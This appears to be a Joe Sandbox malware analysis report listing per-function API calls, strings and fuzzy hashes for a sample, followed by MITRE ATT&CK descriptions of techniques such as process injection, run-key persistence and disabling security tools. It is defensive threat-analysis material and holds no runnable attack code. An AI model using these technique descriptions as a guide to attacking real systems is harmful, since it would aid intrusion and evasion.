Opcode Fuzzy Hash: dfd587649fb87b6f7ea38a3c41e26bf90464b3527a283307b4929a535d535608
Instruction Fuzzy Hash: C3512E3550428B9FDF2ADF28C480ABE7FA5FF56314F244059E8959B2D0EB34AD42CB61

Uniqueness

Uniqueness Score: -1.00%

Function 006160A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 0061613D
_wcslen.LIBCMT ref: 00616149

Strings

CALLARGARRAY, xrefs: 00616143, 00616148

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 8dca4b16caaf3904f8dd3e737ec91c57d387fec42aaab77462c332f10faf1420
Instruction ID: a2af094e29fba9bfbe5c77a2f4b298de65a794908a56d7937972533ced4bc69a
Opcode Fuzzy Hash: 8dca4b16caaf3904f8dd3e737ec91c57d387fec42aaab77462c332f10faf1420
Instruction Fuzzy Hash: 42416075A00219AFCB04DFA8C88A8EEBBB6FF59360F144059F506A7352D7709D81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00624E96 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00624F7E
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00624F93

Strings

', xrefs: 00624EED

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 50d1ad28f7684b3643a571db8ab96b0b69b4907fbe52918f60c9b62bb8d13978
Instruction ID: aafd535bda6ad6fa19a87d194959d66d09726f1dcad9b73a42e05359aa880cef
Opcode Fuzzy Hash: 50d1ad28f7684b3643a571db8ab96b0b69b4907fbe52918f60c9b62bb8d13978
Instruction Fuzzy Hash: 5D314A74A0171A9FDB14CFA9D980BDE7BB6FF88300F10516AE905AB391DB70A941CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0062406F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0059771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00597759
Part of subcall function 0059771B: GetStockObject.GDI32(00000011), ref: 0059776D
Part of subcall function 0059771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00597777

GetWindowRect.USER32(00000000,?), ref: 006240D9
GetSysColor.USER32(00000012), ref: 006240F3

Strings

static, xrefs: 006240B6

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 572efacec163b98034534d1df7651b05a7480ec5460f93f4c02b75e95926529d
Instruction ID: 280c77f8f4e2233e8ce47e43890b4cb95af16677d8d8780560abec0a7584ec88
Opcode Fuzzy Hash: 572efacec163b98034534d1df7651b05a7480ec5460f93f4c02b75e95926529d
Instruction Fuzzy Hash: A1116A7261061AAFDF00DFA8DC45AFA7BB9FB08314F014518FD56E3250EA74E861DB60

Uniqueness

Uniqueness Score: -1.00%

Function 005F256E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269

Part of subcall function 005F4536: GetClassNameW.USER32(?,?,000000FF), ref: 005F4559

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 005F25DC

Strings

ComboBox, xrefs: 005F257B
ListBox, xrefs: 005F25A6

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 10611945e8774401d29af68bf5d9755db95acbabd83d8bc9fdad997a615b8fe7
Instruction ID: e4c2994406809d38766a3354b85e39b1c7bcc81370d29798fdb691cbc4cd6ff5
Opcode Fuzzy Hash: 10611945e8774401d29af68bf5d9755db95acbabd83d8bc9fdad997a615b8fe7
Instruction Fuzzy Hash: 1B01F5B560021AABEF14EB64DD15DFE7B66FF91310F040609F962973D6EA34980C8650

Uniqueness

Uniqueness Score: -1.00%

Function 005F2468 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269

Part of subcall function 005F4536: GetClassNameW.USER32(?,?,000000FF), ref: 005F4559

SendMessageW.USER32(?,00000180,00000000,?), ref: 005F24D6

Strings

ComboBox, xrefs: 005F2475
ListBox, xrefs: 005F24A0

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 1b86ad77ec172bd62b93f82ce7fcbdf506fb74c99c9d663852e6460042a4f93f
Instruction ID: f2c8b59dd88f64751b10e152e2ce0054a08d99c94a1961675d8f851efbc8619f
Opcode Fuzzy Hash: 1b86ad77ec172bd62b93f82ce7fcbdf506fb74c99c9d663852e6460042a4f93f
Instruction Fuzzy Hash: 4401ACB564010F67EF14FB60D959EFF7FA9BF55340F140015B60263282DA949E08C671

Uniqueness

Uniqueness Score: -1.00%

Function 005F24EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269

Part of subcall function 005F4536: GetClassNameW.USER32(?,?,000000FF), ref: 005F4559

SendMessageW.USER32(?,00000182,?,00000000), ref: 005F2558

Strings

ComboBox, xrefs: 005F24F9
ListBox, xrefs: 005F2524

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 8cb8da549140de3d12bedf12c2c1eb81d33b6869d60cdd2d6c3b518d30d090cd
Instruction ID: f21054ac6027d12df186d60763f90f2e9ec5c20a555e42eba74cd482ba0e1ebe
Opcode Fuzzy Hash: 8cb8da549140de3d12bedf12c2c1eb81d33b6869d60cdd2d6c3b518d30d090cd
Instruction Fuzzy Hash: 0801A7B564010E67EF14E764DA16AFF7FA9BB51740F140015BA0167282DA689F09CA71

Uniqueness

Uniqueness Score: -1.00%

Function 005F25F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269

Part of subcall function 005F4536: GetClassNameW.USER32(?,?,000000FF), ref: 005F4559

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 005F2663

Strings

ComboBox, xrefs: 005F2605
ListBox, xrefs: 005F2630

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 92852d7c4f10057a81554d2f1cc2836da5188db6dd9925c2c29c849144a5522e
Instruction ID: 0e43aca72b754323e7d5174d6f502cd017e8cd8d8aa221ce390e6ab2039e357e
Opcode Fuzzy Hash: 92852d7c4f10057a81554d2f1cc2836da5188db6dd9925c2c29c849144a5522e
Instruction Fuzzy Hash: 6AF0D1B1A4021AA6EF14F7A49C56FFF7F69BB40710F040A19BA22A32C2DFA459088650

Uniqueness

Uniqueness Score: -1.00%

Function 00628AD1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00664018,0066405C), ref: 00628B1E
CloseHandle.KERNEL32 ref: 00628B30

Strings

\@f, xrefs: 00628AE9

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \@f
API String ID: 3712363035-3461318062
Opcode ID: e4bf46d2048119e1238d9e896b53ab19e844e0ead6c430f2dd5cb3b9eb840e6e
Instruction ID: d3aed87e42cec27e95e5059d5d91c2010ae66ac0e3071c7b1357f15e45ddd057
Opcode Fuzzy Hash: e4bf46d2048119e1238d9e896b53ab19e844e0ead6c430f2dd5cb3b9eb840e6e
Instruction Fuzzy Hash: EBF05EB2940325BBE3206FA0AC4AFB73E5EEB15795F001020FB08D6192DAB55C4096F8

Uniqueness

Uniqueness Score: -1.00%

Function 005B10D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 005AFAE2: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,005B1102,?,?,?,0059100A), ref: 005AFAE7

IsDebuggerPresent.KERNEL32(?,?,?,0059100A), ref: 005B1106
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0059100A), ref: 005B1115

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 005B1110

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 7938af2d4c5ef17f7b160fc9effc4173fc6394acd72d3808cbc84f9054f777f7
Instruction ID: 974366e9157ecdfabfa0ff04e88e2d4cf8c0a720a65d27ef44266cc89da5e831
Opcode Fuzzy Hash: 7938af2d4c5ef17f7b160fc9effc4173fc6394acd72d3808cbc84f9054f777f7
Instruction Fuzzy Hash: 15E06D70600B118BD3709F28E828386BFF5BB04700F408D1CE946C6291EBB5E448CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 005AF0C5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 005AF102

Strings

05f, xrefs: 005AF0E2
85f, xrefs: 005AF0F7

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: Init_thread_footer
String ID: 05f$85f
API String ID: 1385522511-1946346565
Opcode ID: cbd1fa08e07b047175c1883fe49df0c68466bfebac75ed9263313d5e104f4b1d
Instruction ID: fdb27b5d76bf33063620372e1f1f2759bbd61feef27240b33abb8677e70264e2
Opcode Fuzzy Hash: cbd1fa08e07b047175c1883fe49df0c68466bfebac75ed9263313d5e104f4b1d
Instruction Fuzzy Hash: 3EE0DF31010AB1DBE614DB58F84999C3B52FB4A320B10027AE003876D2EB642E418B14

Uniqueness

Uniqueness Score: -1.00%

Function 005EE59A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 005EE59E

Strings

%.3d, xrefs: 005EE5A9
X64, xrefs: 005EE626

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 429c6bbff2628cc32c7a090248f64edf97dddbbb76eb00c40c68c01fa6165e28
Instruction ID: d810957b5c7ebc9f5c344fc92b999ab085b6ab56d3736d222185604a342daae3
Opcode Fuzzy Hash: 429c6bbff2628cc32c7a090248f64edf97dddbbb76eb00c40c68c01fa6165e28
Instruction Fuzzy Hash: F7D012B1C15159D9CF949BD1ED4A8BD7B7CB71C301F104C53F946A1000E63495099721

Uniqueness

Uniqueness Score: -1.00%

Function 00622CB5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00622CCB
PostMessageW.USER32(00000000), ref: 00622CD2

Part of subcall function 005FF1A7: Sleep.KERNEL32 ref: 005FF21F

Strings

Shell_TrayWnd, xrefs: 00622CC4

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: fc2806c83a8776c455b28fdc5f02fd336e37a6105c2dbecf5decbdd7c88272be
Instruction ID: e78b478e0c00aab52b311d92d360cbe865c4f8c70f5878284b771fd452cd50cb
Opcode Fuzzy Hash: fc2806c83a8776c455b28fdc5f02fd336e37a6105c2dbecf5decbdd7c88272be
Instruction Fuzzy Hash: 1AD022313C03007BF338B730EC0FFCA2A02AB84B00F0008117305AA0C0C9F46801C758

Uniqueness

Uniqueness Score: -1.00%

Function 00622C81 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00622C8B
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00622C9E

Part of subcall function 005FF1A7: Sleep.KERNEL32 ref: 005FF21F

Strings

Shell_TrayWnd, xrefs: 00622C84

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 0f22a4bf9f3dd51e33d5553d19451d8ae604c468812723dc6b2d6d66e81b87e9
Instruction ID: a8a839cd467c9901de07a13b3a69349fce8a287604c656be59a2c9af7f870afe
Opcode Fuzzy Hash: 0f22a4bf9f3dd51e33d5553d19451d8ae604c468812723dc6b2d6d66e81b87e9
Instruction Fuzzy Hash: ECD0C935384750A6E678B770EC0FFDA6A56AB94B11F0108157749AA1D0C9E46805C654

Uniqueness

Uniqueness Score: -1.00%

Function 005CC19D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 005CC233
GetLastError.KERNEL32 ref: 005CC241
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005CC29C

Memory Dump Source

Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true

Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: f295c986647386bedc4e7d5ffccefe4b32da22444ac41e5338470d66c3e210ee
Instruction ID: 584ee062c36bc2ad3a64ab2c1cab7a03e804e020a6aa8d01a54aa83836bd3f2b
Opcode Fuzzy Hash: f295c986647386bedc4e7d5ffccefe4b32da22444ac41e5338470d66c3e210ee
Instruction Fuzzy Hash: 7841B539600256AFDB218FE9C844FAA7FA5FF45720F2441ADE89DAB1A1DB309D41C750

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

